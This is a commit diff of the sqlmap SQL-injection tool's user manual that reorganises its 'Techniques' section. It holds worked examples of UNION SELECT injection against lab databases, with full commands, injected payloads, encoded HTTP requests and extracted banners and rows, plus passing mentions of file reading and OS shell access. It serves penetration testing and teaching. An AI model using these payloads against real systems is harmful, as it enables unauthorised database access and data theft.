Major bug fix to correctly handle httplib.BadStatusLine exception.

Minor improvement to set by default in all HTTP requests the standard HTTP headers (Accept, Accept-Encoding, etc.) Updated user's manual.
2024-11-22 09:36:35 +03:00 · 2008-11-15 12:25:19 +00:00 · 2008-11-15 12:25:19 +00:00 · 84cbc60659
commit 84cbc60659
parent 4bf1fcb8ec
5 changed files with 399 additions and 313 deletions
--- a/doc/README.html
+++ b/doc/README.html
@ -38,12 +38,13 @@ for the latest version.</EM>
 <UL>
 <LI><A NAME="toc5.1">5.1</A> <A HREF="README.html#ss5.1">Request</A>
-<LI><A NAME="toc5.2">5.2</A> <A HREF="README.html#ss5.2">Injection</A>
+<LI><A NAME="toc5.2">5.2</A> <A HREF="README.html#ss5.2">Techniques</A>
-<LI><A NAME="toc5.3">5.3</A> <A HREF="README.html#ss5.3">Fingerprint</A>
+<LI><A NAME="toc5.3">5.3</A> <A HREF="README.html#ss5.3">Injection</A>
-<LI><A NAME="toc5.4">5.4</A> <A HREF="README.html#ss5.4">Enumeration</A>
+<LI><A NAME="toc5.4">5.4</A> <A HREF="README.html#ss5.4">Fingerprint</A>
-<LI><A NAME="toc5.5">5.5</A> <A HREF="README.html#ss5.5">File system access</A>
+<LI><A NAME="toc5.5">5.5</A> <A HREF="README.html#ss5.5">Enumeration</A>
-<LI><A NAME="toc5.6">5.6</A> <A HREF="README.html#ss5.6">Operating system access</A>
+<LI><A NAME="toc5.6">5.6</A> <A HREF="README.html#ss5.6">File system access</A>
-<LI><A NAME="toc5.7">5.7</A> <A HREF="README.html#ss5.7">Miscellaneous</A>
+<LI><A NAME="toc5.7">5.7</A> <A HREF="README.html#ss5.7">Operating system access</A>
 <LI><A NAME="toc5.8">5.8</A> <A HREF="README.html#ss5.8">Miscellaneous</A>
 </UL>
 <P>
 <H2><A NAME="toc6">6.</A> <A HREF="README.html#s6">Disclaimer</A></H2>
@ -360,11 +361,22 @@ Options:
    --auth-cred=ACRED   HTTP Authentication credentials, value: name:password
    --proxy=PROXY       Use a HTTP proxy to connect to the target url
    --threads=THREADS   Maximum number of concurrent HTTP requests (default 1)
    --delay=DELAY       Delay in seconds between each HTTP request
  Injection:
    --string=STRING     String to match in page when the query is valid
    --dbms=DBMS         Force back-end DBMS to this value
  Techniques:
    These options can be used to test for specific SQL injection technique
    or to use one of them to exploit the affected parameter(s) rather than
    using the default blind SQL injection technique.
    --time-test         Test for Time based blind SQL injection
    --union-test        Test for UNION SELECT (inband) SQL injection
    --union-use         Use the UNION SELECT (inband) SQL injection to
                        retrieve the queries output. No need to go blind
  Fingerprint:
    -f, --fingerprint   Perform an extensive database fingerprint
@ -381,9 +393,9 @@ Options:
    --privileges        Enumerate DBMS users privileges (opt: -U)
    --dbs               Enumerate DBMS databases
    --tables            Enumerate DBMS database tables (opt: -D)
-    --columns           Enumerate DBMS database table columns (req: -T, -D)
+    --columns           Enumerate DBMS database table columns (req:-T opt:-D)
-    --dump              Dump DBMS database table entries (req: -T, -D opt: -C,
+    --dump              Dump DBMS database table entries (req: -T, opt: -D,
-                        --start, --stop)
+                        -C, --start, --stop)
    --dump-all          Dump all DBMS databases tables entries
    -D DB               DBMS database to enumerate
    -T TBL              DBMS database table to enumerate
@ -413,9 +425,6 @@ Options:
                        server document root for the moment)
  Miscellaneous:
    --union-test        Test for UNION SELECT (inband) SQL injection
    --union-use         Use the UNION SELECT (inband) SQL injection to
                        retrieve the queries output. No need to go blind
    --eta               Retrieve each query output length and calculate the
                        estimated time of arrival in real time
    -v VERBOSE          Verbosity level: 0-5 (default 0)
@ -1031,9 +1040,23 @@ Connection: close
 </P>
 <P>Note that the HTTP <CODE>User-Agent</CODE> header is tested against SQL
-injection even if you do not overwrite the default sqlmap HTTP
+injection also if you do not overwrite the default sqlmap HTTP
 <CODE>User-Agent</CODE> header value.</P>
 <P>Some sites perform a server-side check on the HTTP <CODE>User-Agent</CODE>
 header value and fail the HTTP response if a valid <CODE>User-Agent</CODE> is
 not provided, its value is not expected or its value is blocked by a web
 application firewall or similar intrusion prevention system. In this case
 sqlmap will show you a message as follows:</P>
 <P>
 <BLOCKQUOTE><CODE>
 <PRE>
 [hh:mm:20] [ERROR] the target url responded with an unknown HTTP status code, try
 to force the HTTP User-Agent header with option --user-agent or -a
 </PRE>
 </CODE></BLOCKQUOTE>
 </P>
 <H3>HTTP <CODE>Basic</CODE> and <CODE>Digest</CODE> authentications</H3>
@ -1172,7 +1195,161 @@ seven HTTP requests, the maximum to retrieve a query output character.</P>
 request. The valid value is a float, for instance 0.5.</P>
-<H2><A NAME="ss5.2">5.2</A> <A HREF="#toc5.2">Injection</A>
+<H2><A NAME="ss5.2">5.2</A> <A HREF="#toc5.2">Techniques</A>
 </H2>
 <H3>Test for Time Based Blind SQL injection</H3>
 <P>Option: <CODE>--time-test</CODE></P>
 <P>TODO</P>
 <H3>Test for UNION SELECT query SQL injection</H3>
 <P>Option: <CODE>--union-test</CODE></P>
 <P>It is possible to test if the target URL is affected by an <B>inband
 SQL injection</B> vulnerability.
 Refer to the <EM>Techniques</EM> section for details on this SQL injection
 technique.</P>
 <P>Example on an <B>Oracle XE 10.2.0.1</B> target:</P>
 <P>
 <BLOCKQUOTE><CODE>
 <PRE>
 $ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1&amp;cat=2" \
  --union-test -v 1
 [...]
 back-end DBMS:  Oracle
 [hh:mm:55] [INFO] testing inband sql injection on parameter 'id'
 [hh:mm:55] [INFO] the target url could be affected by an inband sql injection vulnerability
 valid union:    'http://192.168.1.121:80/sqlmap/oracle/get_int.php?id=1 UNION ALL SELECT 
 NULL, NULL, NULL FROM DUAL-- AND 5601=5601&amp;cat=2'
 </PRE>
 </CODE></BLOCKQUOTE>
 </P>
 <P>Example on a <B>PostgreSQL 8.2.7</B> target:</P>
 <P>
 <BLOCKQUOTE><CODE>
 <PRE>
 $ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_str.php?id=1&amp;cat=2" \
  --union-test -v 1
 [...]
 back-end DBMS:  PostgreSQL
 [hh:mm:05] [INFO] testing inband sql injection on parameter 'id'
 [hh:mm:05] [INFO] the target url could be affected by an inband sql injection vulnerability
 valid union:    'http://192.168.1.121:80/sqlmap/pgsql/get_str.php?id=1' UNION ALL SELECT 
 NULL, NULL, NULL-- AND 'QOAtA'='QOAtA&amp;cat=2'
 </PRE>
 </CODE></BLOCKQUOTE>
 </P>
 <P>As you can see, the target URL parameter <CODE>id</CODE> might be also
 affected by an inband SQL injection.
 In case this vulnerability is exploitable it is strongly recommended to
 use it.</P>
 <H3>Use the UNION SELECT query SQL injection</H3>
 <P>Option: <CODE>--union-use</CODE></P>
 <P>Providing the <CODE>--union-use</CODE> parameter, sqlmap will first test if
 the target URL is affected by an <B>inband SQL injection</B>
 (<CODE>--union-test</CODE>) vulnerability then, in case it is vulnerable and
 exploitable, it will trigger this vulnerability to retrieve the output of
 the <CODE>SELECT</CODE> queries.</P>
 <P>Example on a <B>Microsoft SQL Server 2000 Service Pack 0</B> target:</P>
 <P>
 <BLOCKQUOTE><CODE>
 <PRE>
 $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1&amp;cat=2" -v 1 \
  --union-use --banner
 [...]
 back-end DBMS:  Microsoft SQL Server 2000
 [hh:mm:42] [INFO] fetching banner
 [hh:mm:42] [INFO] testing inband sql injection on parameter 'id'
 [hh:mm:42] [INFO] the target url could be affected by an inband sql injection vulnerability
 [hh:mm:42] [INFO] confirming inband sql injection on parameter 'id'
 [hh:mm:42] [INFO] the target url is affected by an exploitable inband sql injection 
 vulnerability
 [hh:mm:42] [INFO] query:  UNION ALL SELECT NULL, (CHAR(110)+CHAR(83)+CHAR(68)+CHAR(80)+
 CHAR(84)+CHAR(70))+ISNULL(CAST(@@VERSION AS VARCHAR(8000)), (CHAR(32)))+(CHAR(70)+CHAR(82)+
 CHAR(100)+CHAR(106)+CHAR(72)+CHAR(75)), NULL-- AND 5204=5204
 [hh:mm:42] [INFO] performed 3 queries in 0 seconds
 banner:
 ---
 Microsoft SQL Server  2000 - 8.00.194 (Intel X86) 
        Aug  6 2000 00:57:48 
        Copyright (c) 1988-2000 Microsoft Corporation
        Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
 ---
 </PRE>
 </CODE></BLOCKQUOTE>
 </P>
 <P>As you can see, the vulnerable parameter (<CODE>id</CODE>) is affected by both
 blind SQL injection and exploitable inband SQL injection vulnerabilities.</P>
 <P>Example on a <B>MySQL 5.0.51</B> target:</P>
 <P>
 <BLOCKQUOTE><CODE>
 <PRE>
 $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&amp;cat=2" -v 5 \
  --union-use --banner
 [...]
 [hh:mm:25] [INFO] the target url is affected by an exploitable inband sql injection 
 vulnerability
 [hh:mm:25] [INFO] query:  UNION ALL SELECT NULL, CONCAT(CHAR(98,108,76,79,106,78),
 IFNULL(CAST(VERSION() AS CHAR(10000)), CHAR(32)),CHAR(122,110,105,89,121,65)), NULL-- 
 AND 6043=6043
 [hh:mm:25] [TRAFFIC OUT] HTTP request:
 GET /sqlmap/mysql/get_int.php?id=1%20UNION%20ALL%20SELECT%20NULL%2C%20CONCAT%28CHAR%2898
 %2C108%2C76%2C79%2C106%2C78%29%2CIFNULL%28CAST%28VERSION%28%29%20AS%20CHAR%2810000%29%29
 %2C%20CHAR%2832%29%29%2CCHAR%28122%2C110%2C105%2C89%2C121%2C65%29%29%2C%20NULL--%20AND%2
 06043=6043&amp;cat=2 HTTP/1.1
 Host: 192.168.1.121:80
 User-agent: sqlmap/0.6.3 (http://sqlmap.sourceforge.net)
 Connection: close
 [hh:mm:25] [TRAFFIC IN] HTTP response (OK - 200):
 Date: Mon, 28 Jul 2008 22:34:25 GMT
 Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.2 with Suhosin-Patch mod_ssl/2.2.8 
 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
 X-Powered-By: PHP/5.2.4-2ubuntu5.2
 Content-Length: 194
 Connection: close
 Content-Type: text/html
 &lt;html&gt;&lt;body&gt;
 &lt;b&gt;SQL results:&lt;/b&gt;
 &lt;table border="1"&gt;
 &lt;tr&gt;&lt;td&gt;1&lt;/td&gt;&lt;td&gt;luther&lt;/td&gt;&lt;td&gt;blissett&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;/td&gt;&lt;td&gt;blLOjN5.0.51a-3ubuntu5.2zniYyA&lt;/td&gt;&lt;td&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;/body&gt;&lt;/html&gt;
 [hh:mm:25] [INFO] performed 3 queries in 0 seconds
 banner:    '5.0.51a-3ubuntu5.2'
 </PRE>
 </CODE></BLOCKQUOTE>
 </P>
 <P>As you can see, the MySQL <CODE>version()</CODE> function (banner) output is
 nested (inband) within the HTTP response page, this makes the inband SQL
 injection exploitable.</P>
 <H2><A NAME="ss5.3">5.3</A> <A HREF="#toc5.3">Injection</A>
 </H2>
 <H3>String match</H3>
@ -1369,7 +1546,7 @@ back-end database management system. If you do not know it, let sqlmap
 automatically identify it for you.</P>
-<H2><A NAME="ss5.3">5.3</A> <A HREF="#toc5.3">Fingerprint</A>
+<H2><A NAME="ss5.4">5.4</A> <A HREF="#toc5.4">Fingerprint</A>
 </H2>
 <H3>Extensive database management system fingerprint</H3>
@ -1584,7 +1761,7 @@ parsing library that fetches data from Chip Andrews'
 <A HREF="http://www.sqlsecurity.com/FAQs/SQLServerVersionDatabase/tabid/63/Default.aspx">SQLSecurity.com site</A> and outputs it to the XML versions file.</P>
-<H2><A NAME="ss5.4">5.4</A> <A HREF="#toc5.4">Enumeration</A>
+<H2><A NAME="ss5.5">5.5</A> <A HREF="#toc5.5">Enumeration</A>
 </H2>
 <H3>Banner</H3>
@ -2664,7 +2841,7 @@ column names of the table then asks if the query can return multiple
 entries and goes on.</P>
-<H2><A NAME="ss5.5">5.5</A> <A HREF="#toc5.5">File system access</A>
+<H2><A NAME="ss5.6">5.6</A> <A HREF="#toc5.6">File system access</A>
 </H2>
 <H3>Read a specific file content</H3>
@ -2708,7 +2885,7 @@ inquis:x:1000:100:Bernardo Damele A. G.,,,:/home/inquis:/bin/bash
 </P>
-<H2><A NAME="ss5.6">5.6</A> <A HREF="#toc5.6">Operating system access</A>
+<H2><A NAME="ss5.7">5.7</A> <A HREF="#toc5.7">Operating system access</A>
 </H2>
 <H3>Prompt for an interactive operating system shell</H3>
@ -2746,153 +2923,9 @@ $ exit
 functionalities of SQL shell.</P>
-<H2><A NAME="ss5.7">5.7</A> <A HREF="#toc5.7">Miscellaneous</A>
+<H2><A NAME="ss5.8">5.8</A> <A HREF="#toc5.8">Miscellaneous</A>
 </H2>
 <H3>Test for UNION SELECT query SQL injection</H3>
 <P>Option: <CODE>--union-test</CODE></P>
 <P>It is possible to test if the target URL is affected by an <B>inband
 SQL injection</B> vulnerability.
 Refer to the <EM>Techniques</EM> section for details on this SQL injection
 technique.</P>
 <P>Example on an <B>Oracle XE 10.2.0.1</B> target:</P>
 <P>
 <BLOCKQUOTE><CODE>
 <PRE>
 $ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1&amp;cat=2" \
  --union-test -v 1
 [...]
 back-end DBMS:  Oracle
 [hh:mm:55] [INFO] testing inband sql injection on parameter 'id'
 [hh:mm:55] [INFO] the target url could be affected by an inband sql injection vulnerability
 valid union:    'http://192.168.1.121:80/sqlmap/oracle/get_int.php?id=1 UNION ALL SELECT 
 NULL, NULL, NULL FROM DUAL-- AND 5601=5601&amp;cat=2'
 </PRE>
 </CODE></BLOCKQUOTE>
 </P>
 <P>Example on a <B>PostgreSQL 8.2.7</B> target:</P>
 <P>
 <BLOCKQUOTE><CODE>
 <PRE>
 $ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_str.php?id=1&amp;cat=2" \
  --union-test -v 1
 [...]
 back-end DBMS:  PostgreSQL
 [hh:mm:05] [INFO] testing inband sql injection on parameter 'id'
 [hh:mm:05] [INFO] the target url could be affected by an inband sql injection vulnerability
 valid union:    'http://192.168.1.121:80/sqlmap/pgsql/get_str.php?id=1' UNION ALL SELECT 
 NULL, NULL, NULL-- AND 'QOAtA'='QOAtA&amp;cat=2'
 </PRE>
 </CODE></BLOCKQUOTE>
 </P>
 <P>As you can see, the target URL parameter <CODE>id</CODE> might be also
 affected by an inband SQL injection.
 In case this vulnerability is exploitable it is strongly recommended to
 use it.</P>
 <H3>Use the UNION SELECT query SQL injection</H3>
 <P>Option: <CODE>--union-use</CODE></P>
 <P>Providing the <CODE>--union-use</CODE> parameter, sqlmap will first test if
 the target URL is affected by an <B>inband SQL injection</B>
 (<CODE>--union-test</CODE>) vulnerability then, in case it is vulnerable and
 exploitable, it will trigger this vulnerability to retrieve the output of
 the <CODE>SELECT</CODE> queries.</P>
 <P>Example on a <B>Microsoft SQL Server 2000 Service Pack 0</B> target:</P>
 <P>
 <BLOCKQUOTE><CODE>
 <PRE>
 $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1&amp;cat=2" -v 1 \
  --union-use --banner
 [...]
 back-end DBMS:  Microsoft SQL Server 2000
 [hh:mm:42] [INFO] fetching banner
 [hh:mm:42] [INFO] testing inband sql injection on parameter 'id'
 [hh:mm:42] [INFO] the target url could be affected by an inband sql injection vulnerability
 [hh:mm:42] [INFO] confirming inband sql injection on parameter 'id'
 [hh:mm:42] [INFO] the target url is affected by an exploitable inband sql injection 
 vulnerability
 [hh:mm:42] [INFO] query:  UNION ALL SELECT NULL, (CHAR(110)+CHAR(83)+CHAR(68)+CHAR(80)+
 CHAR(84)+CHAR(70))+ISNULL(CAST(@@VERSION AS VARCHAR(8000)), (CHAR(32)))+(CHAR(70)+CHAR(82)+
 CHAR(100)+CHAR(106)+CHAR(72)+CHAR(75)), NULL-- AND 5204=5204
 [hh:mm:42] [INFO] performed 3 queries in 0 seconds
 banner:
 ---
 Microsoft SQL Server  2000 - 8.00.194 (Intel X86) 
        Aug  6 2000 00:57:48 
        Copyright (c) 1988-2000 Microsoft Corporation
        Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
 ---
 </PRE>
 </CODE></BLOCKQUOTE>
 </P>
 <P>As you can see, the vulnerable parameter (<CODE>id</CODE>) is affected by both
 blind SQL injection and exploitable inband SQL injection vulnerabilities.</P>
 <P>Example on a <B>MySQL 5.0.51</B> target:</P>
 <P>
 <BLOCKQUOTE><CODE>
 <PRE>
 $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&amp;cat=2" -v 5 \
  --union-use --banner
 [...]
 [hh:mm:25] [INFO] the target url is affected by an exploitable inband sql injection 
 vulnerability
 [hh:mm:25] [INFO] query:  UNION ALL SELECT NULL, CONCAT(CHAR(98,108,76,79,106,78),
 IFNULL(CAST(VERSION() AS CHAR(10000)), CHAR(32)),CHAR(122,110,105,89,121,65)), NULL-- 
 AND 6043=6043
 [hh:mm:25] [TRAFFIC OUT] HTTP request:
 GET /sqlmap/mysql/get_int.php?id=1%20UNION%20ALL%20SELECT%20NULL%2C%20CONCAT%28CHAR%2898
 %2C108%2C76%2C79%2C106%2C78%29%2CIFNULL%28CAST%28VERSION%28%29%20AS%20CHAR%2810000%29%29
 %2C%20CHAR%2832%29%29%2CCHAR%28122%2C110%2C105%2C89%2C121%2C65%29%29%2C%20NULL--%20AND%2
 06043=6043&amp;cat=2 HTTP/1.1
 Host: 192.168.1.121:80
 User-agent: sqlmap/0.6.3 (http://sqlmap.sourceforge.net)
 Connection: close
 [hh:mm:25] [TRAFFIC IN] HTTP response (OK - 200):
 Date: Mon, 28 Jul 2008 22:34:25 GMT
 Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.2 with Suhosin-Patch mod_ssl/2.2.8 
 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
 X-Powered-By: PHP/5.2.4-2ubuntu5.2
 Content-Length: 194
 Connection: close
 Content-Type: text/html
 &lt;html&gt;&lt;body&gt;
 &lt;b&gt;SQL results:&lt;/b&gt;
 &lt;table border="1"&gt;
 &lt;tr&gt;&lt;td&gt;1&lt;/td&gt;&lt;td&gt;luther&lt;/td&gt;&lt;td&gt;blissett&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;/td&gt;&lt;td&gt;blLOjN5.0.51a-3ubuntu5.2zniYyA&lt;/td&gt;&lt;td&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;/body&gt;&lt;/html&gt;
 [hh:mm:25] [INFO] performed 3 queries in 0 seconds
 banner:    '5.0.51a-3ubuntu5.2'
 </PRE>
 </CODE></BLOCKQUOTE>
 </P>
 <P>As you can see, the MySQL <CODE>version()</CODE> function (banner) output is
 nested (inband) within the HTTP response page, this makes the inband SQL
 injection exploitable.</P>
 <H3>Estimated time of arrival</H3>
 <P>Option: <CODE>--eta</CODE></P>
--- a/doc/README.pdf
+++ b/doc/README.pdf
--- a/doc/README.sgml
+++ b/doc/README.sgml
@ -323,11 +323,22 @@ Options:
    --auth-cred=ACRED   HTTP Authentication credentials, value: name:password
    --proxy=PROXY       Use a HTTP proxy to connect to the target url
    --threads=THREADS   Maximum number of concurrent HTTP requests (default 1)
    --delay=DELAY       Delay in seconds between each HTTP request
  Injection:
    --string=STRING     String to match in page when the query is valid
    --dbms=DBMS         Force back-end DBMS to this value
  Techniques:
    These options can be used to test for specific SQL injection technique
    or to use one of them to exploit the affected parameter(s) rather than
    using the default blind SQL injection technique.
    --time-test         Test for Time based blind SQL injection
    --union-test        Test for UNION SELECT (inband) SQL injection
    --union-use         Use the UNION SELECT (inband) SQL injection to
                        retrieve the queries output. No need to go blind
  Fingerprint:
    -f, --fingerprint   Perform an extensive database fingerprint
@ -344,9 +355,9 @@ Options:
    --privileges        Enumerate DBMS users privileges (opt: -U)
    --dbs               Enumerate DBMS databases
    --tables            Enumerate DBMS database tables (opt: -D)
-    --columns           Enumerate DBMS database table columns (req: -T, -D)
+    --columns           Enumerate DBMS database table columns (req:-T opt:-D)
-    --dump              Dump DBMS database table entries (req: -T, -D opt: -C,
+    --dump              Dump DBMS database table entries (req: -T, opt: -D,
-                        --start, --stop)
+                        -C, --start, --stop)
    --dump-all          Dump all DBMS databases tables entries
    -D DB               DBMS database to enumerate
    -T TBL              DBMS database table to enumerate
@ -376,9 +387,6 @@ Options:
                        server document root for the moment)
  Miscellaneous:
    --union-test        Test for UNION SELECT (inband) SQL injection
    --union-use         Use the UNION SELECT (inband) SQL injection to
                        retrieve the queries output. No need to go blind
    --eta               Retrieve each query output length and calculate the
                        estimated time of arrival in real time
    -v VERBOSE          Verbosity level: 0-5 (default 0)
@ -977,9 +985,21 @@ Connection: close
 <p>
 Note that the HTTP <tt>User-Agent</tt> header is tested against SQL
-injection even if you do not overwrite the default sqlmap HTTP
+injection also if you do not overwrite the default sqlmap HTTP
 <tt>User-Agent</tt> header value.
 <p>
 Some sites perform a server-side check on the HTTP <tt>User-Agent</tt>
 header value and fail the HTTP response if a valid <tt>User-Agent</tt> is
 not provided, its value is not expected or its value is blocked by a web
 application firewall or similar intrusion prevention system. In this case
 sqlmap will show you a message as follows:
 <tscreen><verb>
 [hh:mm:20] [ERROR] the target url responded with an unknown HTTP status code, try
 to force the HTTP User-Agent header with option --user-agent or -a
 </verb></tscreen>
 <sect2>HTTP <tt>Basic</tt> and <tt>Digest</tt> authentications
@ -1118,6 +1138,160 @@ It is possible to specify a number of seconds to wait between each HTTP
 request. The valid value is a float, for instance 0.5.
 <sect1>Techniques
 <sect2>Test for Time Based Blind SQL injection
 <p>
 Option: <tt>--time-test</tt>
 <p>
 TODO
 <sect2>Test for UNION SELECT query SQL injection
 <p>
 Option: <tt>--union-test</tt>
 <p>
 It is possible to test if the target URL is affected by an <bf>inband
 SQL injection</bf> vulnerability.
 Refer to the <em>Techniques</em> section for details on this SQL injection
 technique.
 <p>
 Example on an <bf>Oracle XE 10.2.0.1</bf> target:
 <tscreen><verb>
 $ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1&amp;cat=2" \
  --union-test -v 1
 [...]
 back-end DBMS:  Oracle
 [hh:mm:55] [INFO] testing inband sql injection on parameter 'id'
 [hh:mm:55] [INFO] the target url could be affected by an inband sql injection vulnerability
 valid union:    'http://192.168.1.121:80/sqlmap/oracle/get_int.php?id=1 UNION ALL SELECT 
 NULL, NULL, NULL FROM DUAL-- AND 5601=5601&amp;cat=2'
 </verb></tscreen>
 <p>
 Example on a <bf>PostgreSQL 8.2.7</bf> target:
 <tscreen><verb>
 $ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_str.php?id=1&amp;cat=2" \
  --union-test -v 1
 [...]
 back-end DBMS:	PostgreSQL
 [hh:mm:05] [INFO] testing inband sql injection on parameter 'id'
 [hh:mm:05] [INFO] the target url could be affected by an inband sql injection vulnerability
 valid union:    'http://192.168.1.121:80/sqlmap/pgsql/get_str.php?id=1' UNION ALL SELECT 
 NULL, NULL, NULL-- AND 'QOAtA'='QOAtA&amp;cat=2'
 </verb></tscreen>
 <p>
 As you can see, the target URL parameter <tt>id</tt> might be also
 affected by an inband SQL injection.
 In case this vulnerability is exploitable it is strongly recommended to
 use it.
 <sect2>Use the UNION SELECT query SQL injection
 <p>
 Option: <tt>--union-use</tt>
 <p>
 Providing the <tt>--union-use</tt> parameter, sqlmap will first test if
 the target URL is affected by an <bf>inband SQL injection</bf>
 (<tt>--union-test</tt>) vulnerability then, in case it is vulnerable and
 exploitable, it will trigger this vulnerability to retrieve the output of
 the <tt>SELECT</tt> queries.
 <p>
 Example on a <bf>Microsoft SQL Server 2000 Service Pack 0</bf> target:
 <tscreen><verb>
 $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1&amp;cat=2" -v 1 \
  --union-use --banner
 [...]
 back-end DBMS:	Microsoft SQL Server 2000
 [hh:mm:42] [INFO] fetching banner
 [hh:mm:42] [INFO] testing inband sql injection on parameter 'id'
 [hh:mm:42] [INFO] the target url could be affected by an inband sql injection vulnerability
 [hh:mm:42] [INFO] confirming inband sql injection on parameter 'id'
 [hh:mm:42] [INFO] the target url is affected by an exploitable inband sql injection 
 vulnerability
 [hh:mm:42] [INFO] query:  UNION ALL SELECT NULL, (CHAR(110)+CHAR(83)+CHAR(68)+CHAR(80)+
 CHAR(84)+CHAR(70))+ISNULL(CAST(@@VERSION AS VARCHAR(8000)), (CHAR(32)))+(CHAR(70)+CHAR(82)+
 CHAR(100)+CHAR(106)+CHAR(72)+CHAR(75)), NULL-- AND 5204=5204
 [hh:mm:42] [INFO] performed 3 queries in 0 seconds
 banner:
 ---
 Microsoft SQL Server  2000 - 8.00.194 (Intel X86) 
 	Aug  6 2000 00:57:48 
 	Copyright (c) 1988-2000 Microsoft Corporation
 	Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
 ---
 </verb></tscreen>
 <p>
 As you can see, the vulnerable parameter (<tt>id</tt>) is affected by both
 blind SQL injection and exploitable inband SQL injection vulnerabilities.
 <p>
 Example on a <bf>MySQL 5.0.51</bf> target:
 <tscreen><verb>
 $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&amp;cat=2" -v 5 \
  --union-use --banner
 [...]
 [hh:mm:25] [INFO] the target url is affected by an exploitable inband sql injection 
 vulnerability
 [hh:mm:25] [INFO] query:  UNION ALL SELECT NULL, CONCAT(CHAR(98,108,76,79,106,78),
 IFNULL(CAST(VERSION() AS CHAR(10000)), CHAR(32)),CHAR(122,110,105,89,121,65)), NULL-- 
 AND 6043=6043
 [hh:mm:25] [TRAFFIC OUT] HTTP request:
 GET /sqlmap/mysql/get_int.php?id=1%20UNION%20ALL%20SELECT%20NULL%2C%20CONCAT%28CHAR%2898
 %2C108%2C76%2C79%2C106%2C78%29%2CIFNULL%28CAST%28VERSION%28%29%20AS%20CHAR%2810000%29%29
 %2C%20CHAR%2832%29%29%2CCHAR%28122%2C110%2C105%2C89%2C121%2C65%29%29%2C%20NULL--%20AND%2
 06043=6043&amp;cat=2 HTTP/1.1
 Host: 192.168.1.121:80
 User-agent: sqlmap/0.6.3 (http://sqlmap.sourceforge.net)
 Connection: close
 [hh:mm:25] [TRAFFIC IN] HTTP response (OK - 200):
 Date: Mon, 28 Jul 2008 22:34:25 GMT
 Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.2 with Suhosin-Patch mod_ssl/2.2.8 
 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
 X-Powered-By: PHP/5.2.4-2ubuntu5.2
 Content-Length: 194
 Connection: close
 Content-Type: text/html
 &lt;html&gt;&lt;body&gt;
 &lt;b&gt;SQL results:&lt;/b&gt;
 &lt;table border="1"&gt;
 &lt;tr&gt;&lt;td&gt;1&lt;/td&gt;&lt;td&gt;luther&lt;/td&gt;&lt;td&gt;blissett&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;/td&gt;&lt;td&gt;blLOjN5.0.51a-3ubuntu5.2zniYyA&lt;/td&gt;&lt;td&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;/body&gt;&lt;/html&gt;
 [hh:mm:25] [INFO] performed 3 queries in 0 seconds
 banner:    '5.0.51a-3ubuntu5.2'
 </verb></tscreen>
 <p>
 As you can see, the MySQL <tt>version()</tt> function (banner) output is
 nested (inband) within the HTTP response page, this makes the inband SQL
 injection exploitable.
 <sect1>Injection
 <sect2>String match
@ -2671,149 +2845,6 @@ functionalities of SQL shell.
 <sect1>Miscellaneous
 <sect2>Test for UNION SELECT query SQL injection
 <p>
 Option: <tt>--union-test</tt>
 <p>
 It is possible to test if the target URL is affected by an <bf>inband
 SQL injection</bf> vulnerability.
 Refer to the <em>Techniques</em> section for details on this SQL injection
 technique.
 <p>
 Example on an <bf>Oracle XE 10.2.0.1</bf> target:
 <tscreen><verb>
 $ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1&amp;cat=2" \
  --union-test -v 1
 [...]
 back-end DBMS:  Oracle
 [hh:mm:55] [INFO] testing inband sql injection on parameter 'id'
 [hh:mm:55] [INFO] the target url could be affected by an inband sql injection vulnerability
 valid union:    'http://192.168.1.121:80/sqlmap/oracle/get_int.php?id=1 UNION ALL SELECT 
 NULL, NULL, NULL FROM DUAL-- AND 5601=5601&amp;cat=2'
 </verb></tscreen>
 <p>
 Example on a <bf>PostgreSQL 8.2.7</bf> target:
 <tscreen><verb>
 $ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_str.php?id=1&amp;cat=2" \
  --union-test -v 1
 [...]
 back-end DBMS:	PostgreSQL
 [hh:mm:05] [INFO] testing inband sql injection on parameter 'id'
 [hh:mm:05] [INFO] the target url could be affected by an inband sql injection vulnerability
 valid union:    'http://192.168.1.121:80/sqlmap/pgsql/get_str.php?id=1' UNION ALL SELECT 
 NULL, NULL, NULL-- AND 'QOAtA'='QOAtA&amp;cat=2'
 </verb></tscreen>
 <p>
 As you can see, the target URL parameter <tt>id</tt> might be also
 affected by an inband SQL injection.
 In case this vulnerability is exploitable it is strongly recommended to
 use it.
 <sect2>Use the UNION SELECT query SQL injection
 <p>
 Option: <tt>--union-use</tt>
 <p>
 Providing the <tt>--union-use</tt> parameter, sqlmap will first test if
 the target URL is affected by an <bf>inband SQL injection</bf>
 (<tt>--union-test</tt>) vulnerability then, in case it is vulnerable and
